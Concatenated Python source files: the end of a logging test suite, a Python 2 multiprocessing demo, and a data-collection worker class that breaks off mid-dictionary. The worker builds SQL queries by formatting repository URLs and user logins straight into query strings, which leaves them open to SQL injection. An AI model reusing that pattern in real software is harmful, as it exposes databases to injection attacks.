self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_find_caller_with_stacklevel(self):
the_level = 1
def innermost():
self.logger.warning('test', stacklevel=the_level)
def inner():
innermost()
def outer():
inner()
records = self.recording.records
outer()
self.assertEqual(records[-1].funcName, 'innermost')
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'inner')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'outer')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
self.assertGreater(records[-1].lineno, lineno)
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_is_enabled_for_disabled_logger(self):
old_disabled = self.logger.disabled
old_disable = self.logger.manager.disable
self.logger.disabled = True
self.logger.manager.disable = 21
self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('root'))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
def test_namer_rotator_inheritance(self):
class HandlerWithNamerAndRotator(logging.handlers.RotatingFileHandler):
def namer(self, name):
return name + ".test"
def rotator(self, source, dest):
if os.path.exists(source):
os.rename(source, dest + ".rotated")
rh = HandlerWithNamerAndRotator(
self.fn, backupCount=2, maxBytes=1)
self.assertEqual(rh.namer(self.fn), self.fn + ".test")
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(rh.namer(self.fn + ".1") + ".rotated")
self.assertFalse(os.path.exists(rh.namer(self.fn + ".1")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
tests = [
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase
]
if hasattr(logging.handlers, 'QueueListener'):
tests.append(QueueListenerTest)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
multiprocessing_daemon.py
|
import multiprocessing
import time
import sys
def daemon():
p = multiprocessing.current_process()
print 'starting:', p.name, p.pid
sys.stdout.flush()
time.sleep(2)
print 'Exiting :', p.name, p.pid
sys.stdout.flush()
def non_daemon():
p = multiprocessing.current_process()
print 'starting:', p.name, p.pid
sys.stdout.flush()
print 'Exiting :', p.name, p.pid
sys.stdout.flush()
if __name__ == '__main__':
d = multiprocessing.Process(name='daemon', target=daemon)
d.daemon = True
n = multiprocessing.Process(name='non_daemon', target=non_daemon)
n.daemon = False
d.start()
time.sleep(1)
n.start()
|
worker_base.py
|
from workers.worker_persistance import *
#I figure I can seperate this class into at least three parts.
#I should also look into the subclass and see what uses what.
#
# Parts (Hierarchal relation)
#1. Persistance
#2. Base
#3. Github/lab
# Might be good to seperate the machine learning functionality into its own class too.
class Worker(Persistant):
## Set Thread Safety for OSX
# os.system("./osx-thread.sh")
def __init__(self, worker_type, config={}, given=[], models=[], data_tables=[], operations_tables=[], platform="github"):
#Construct the persistant functionality for the worker
super().__init__(worker_type,data_tables,operations_tables)
self.collection_start_time = None
self._task = None # task currently being worked on (dict)
self._child = None # process of currently running task (multiprocessing process)
self._queue = Queue() # tasks stored here 1 at a time (in a mp queue so it can translate across multiple processes)
# if we are finishing a previous task, certain operations work differently
self.finishing_task = False
# Update config with options that are general and not specific to any worker
self.augur_config = AugurConfig(self._root_augur_dir)
#TODO: consider taking parts of this out for the base class and then overriding it in WorkerGitInterfaceable
self.config.update({'offline_mode': False})
self.config.update(config)
self.task_info = None
self.repo_id = None
self.owner = None
self.repo = None
self.given = given
self.models = models
self.debug_data = [] if 'debug_data' not in self.config else self.config['debug_data']
self.specs = {
'id': self.config['id'], # what the broker knows this worker as
'location': self.config['location'], # host + port worker is running on (so broker can send tasks here)
'qualifications': [
{
'given': self.given, # type of repo this worker can be given as a task
'models': self.models # models this worker can fill for a repo as a task
}
],
'config': self.config
}
# Send broker hello message
if self.config['offline_mode'] is False:
self.connect_to_broker()
try:
self.tool_source
self.tool_version
self.data_source
except:
self.tool_source = 'Augur Worker Testing'
self.tool_version = '0.0.0'
self.data_source = 'Augur Worker Testing'
def write_debug_data(self, data, name):
if name in self.debug_data:
with open(f'{name}.json', 'w') as f:
json.dump(data, f)
@property
def results_counter(self):
""" Property that is returned when the worker's current results_counter is referenced
"""
if self.worker_type == 'facade_worker':
return self.cfg.repos_processed #TODO: figure out why this doesn't work...
else:
return self._results_counter
@results_counter.setter
def results_counter(self, value):
""" entry point for the broker to add a task to the queue
Adds this task to the queue, and calls method to process queue
"""
self._results_counter = value
@property
def task(self):
""" Property that is returned when the worker's current task is referenced
"""
return self._task
@task.setter
def task(self, value):
""" entry point for the broker to add a task to the queue
Adds this task to the queue, and calls method to process queue
"""
# If the task has one of our "valid" job types
if value['job_type'] == "UPDATE" or value['job_type'] == "MAINTAIN":
self._queue.put(value)
# Setting that causes paginating through ALL pages, not just unknown ones
# This setting is set by the housekeeper and is attached to the task before it gets sent here
if 'focused_task' in value:
if value['focused_task'] == 1:
self.logger.debug("Focused task is ON\n")
self.finishing_task = True
self._task = value
self.run()
def cancel(self):
""" Delete/cancel current task
"""
self._task = None
def run(self):
""" Kicks off the processing of the queue if it is not already being processed
Gets run whenever a new task is added
"""
# Spawn a subprocess to handle message reading and performing the tasks
self._child = Process(target=self.collect, args=())
self._child.start()
def collect(self):
""" Function to process each entry in the worker's task queue
Determines what action to take based off the message type
"""
self.initialize_logging() # need to initialize logging again in child process cause multiprocessing
self.logger.info("Starting data collection process\n")
self.initialize_database_connections()
#self.logger.info("Got to this point.")
#self.logger.info(f"This is the oauths 0 index {self.oauths}")
while True:
if not self._queue.empty():
message = self._queue.get() # Get the task off our MP queue
else:
self.logger.info("No job found.")
break
self.logger.info("Popped off message: {}\n".format(str(message)))
if message['job_type'] == 'STOP':
break
# If task is not a valid job type
if message['job_type'] != 'MAINTAIN' and message['job_type'] != 'UPDATE':
raise ValueError('{} is not a recognized task type'.format(message['job_type']))
pass
# Query repo_id corresponding to repo url of given task
repoUrlSQL = s.sql.text("""
SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'
""".format(message['given'][self.given[0][0]]))
repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])
self.logger.info("repo_id for which data collection is being initiated: {}".format(str(repo_id)))
# Call method corresponding to model sent in task
try:
model_method = getattr(self, '{}_model'.format(message['models'][0]))
#TODO: set this to record exceptions seperatly. This errored and it took a while to figure that ^ wasn't the line that was erroring.
self.record_model_process(repo_id, 'repo_info')
except Exception as e:
self.logger.error('Error: {}.\nNo defined method for model: {}, '.format(e, message['models'][0]) +
'must have name of {}_model'.format(message['models'][0]))
self.register_task_failure(message, repo_id, e)
break
# Model method calls wrapped in try/except so that any unexpected error that occurs can be caught
# and worker can move onto the next task without stopping
try:
self.logger.info("Calling model method {}_model".format(message['models'][0]))
self.task_info = message
self.repo_id = repo_id
self.owner, self.repo = self.get_owner_repo(list(message['given'].values())[0])
model_method(message, repo_id)
except Exception as e: # this could be a custom exception, might make things easier
self.register_task_failure(message, repo_id, e)
break
self.logger.debug('Closing database connections\n')
self.db.dispose()
self.helper_db.dispose()
self.logger.info("Collection process finished")
def connect_to_broker(self):
connected = False
for i in range(5):
try:
self.logger.debug("Connecting to broker, attempt {}\n".format(i))
if i > 0:
time.sleep(10)
requests.post('http://{}:{}/api/unstable/workers'.format(
self.config['host_broker'],self.config['port_broker']), json=self.specs)
self.logger.info("Connection to the broker was successful\n")
connected = True
break
except requests.exceptions.ConnectionError:
self.logger.error('Cannot connect to the broker. Trying again...\n')
if not connected:
sys.exit('Could not connect to the broker after 5 attempts! Quitting...\n')
@staticmethod
def dump_queue(queue):
""" Empties all pending items in a queue and returns them in a list.
"""
result = []
queue.put("STOP")
for i in iter(queue.get, 'STOP'):
result.append(i)
# time.sleep(.1)
return result
def find_id_from_login(self, login, platform='github'):
""" Retrieves our contributor table primary key value for the contributor with
the given GitHub login credentials, if this contributor is not there, then
they get inserted.
:param login: String, the GitHub login username to find the primary key id for
:return: Integer, the id of the row in our database with the matching GitHub login
"""
idSQL = s.sql.text("""
SELECT cntrb_id FROM contributors WHERE cntrb_login = '{}' \
AND LOWER(data_source) = '{} api'
""".format(login, platform))
rs = pd.read_sql(idSQL, self.db, params={})
data_list = [list(row) for row in rs.itertuples(index=False)]
try:
return data_list[0][0]
except:
self.logger.info('contributor needs to be added...')
if platform == 'github':
cntrb_url = ("https://api.github.com/users/" + login)
elif platform == 'gitlab':
cntrb_url = ("https://gitlab.com/api/v4/users?username=" + login )
self.logger.info("Hitting endpoint: {} ...\n".format(cntrb_url))
while True:
try:
r = requests.get(url=cntrb_url, headers=self.headers)
break
except TimeoutError as e:
self.logger.info("Request timed out. Sleeping 10 seconds and trying again...\n")
time.sleep(30)
self.update_rate_limit(r)
contributor = r.json()
company = None
location = None
email = None
if 'company' in contributor:
company = contributor['company']
if 'location' in contributor:
location = contributor['location']
if 'email' in contributor:
email = contributor['email']
if platform == 'github':
cntrb = {
'cntrb_login': contributor['login'] if 'login' in contributor else None,
'cntrb_email': contributor['email'] if 'email' in contributor else None,
'cntrb_company': contributor['company'] if 'company' in contributor else None,
'cntrb_location': contributor['location'] if 'location' in contributor else None,
'cntrb_created_at': contributor['created_at'] if 'created_at' in contributor else None,
'cntrb_canonical': contributor['email'] if 'email' in contributor else None,
'gh_user_id': contributor['id'] if 'id' in contributor else None,
'gh_login': contributor['login'] if 'login' in contributor else None,
'gh_url': contributor['url'] if 'url' in contributor else None,
'gh_html_url': contributor['html_url'] if 'html_url' in contributor else None,
'gh_node_id': contributor['node_id'] if 'node_id' in contributor else None,
'gh_avatar_url': contributor['avatar_url'] if 'avatar_url' in contributor else None,
'gh_gravatar_id': contributor['gravatar_id'] if 'gravatar_id' in contributor else None,
'gh_followers_url': contributor['followers_url'] if 'followers_url' in contributor else None,
'gh_following_url': contributor['following_url'] if 'following_url' in contributor else None,
'gh_gists_url': contributor['gists_url'] if 'gists_url' in contributor else None,
'gh_starred_url': contributor['starred_url'] if 'starred_url' in contributor else None,
'gh_subscriptions_url': contributor['subscriptions_url'] if 'subscriptions_url' in contributor else None,
'gh_organizations_url': contributor['organizations_url'] if 'organizations_url' in contributor else None,
'gh_repos_url': contributor['repos_url'] if 'repos_url' in contributor else None,
'gh_events_url': contributor['events_url'] if 'events_url' in contributor else None,
'gh_received_events_url': contributor['received_events_url'] if 'received_events_url' in contributor else None,
'gh_type': contributor['type'] if 'type' in contributor else None,
'gh_site_admin': contributor['site_admin'] if 'site_admin' in contributor else None,
'tool_source': self.tool_source,
'tool_version': self.tool_version,
'data_source': self.data_source
}
elif platform == 'gitlab':
cntrb = {
'cntrb_login': contributor[0]['username'] if 'username' in contributor[0] else None,
'cntrb_email': email,
'cntrb_company': company,
'cntrb_location': location,
'cntrb_created_at': contributor[0]['created_at'] if 'created_at' in contributor[0] else None,
'cntrb_canonical': email,
'gh_user_id': contributor[0]['id'],
'gh_login': contributor[0]['username'],
'gh_url': contributor[0]['web_url'],
'gh_html_url': None,
'gh_node_id': None,
'gh_avatar_url': contributor[0]['avatar_url'],
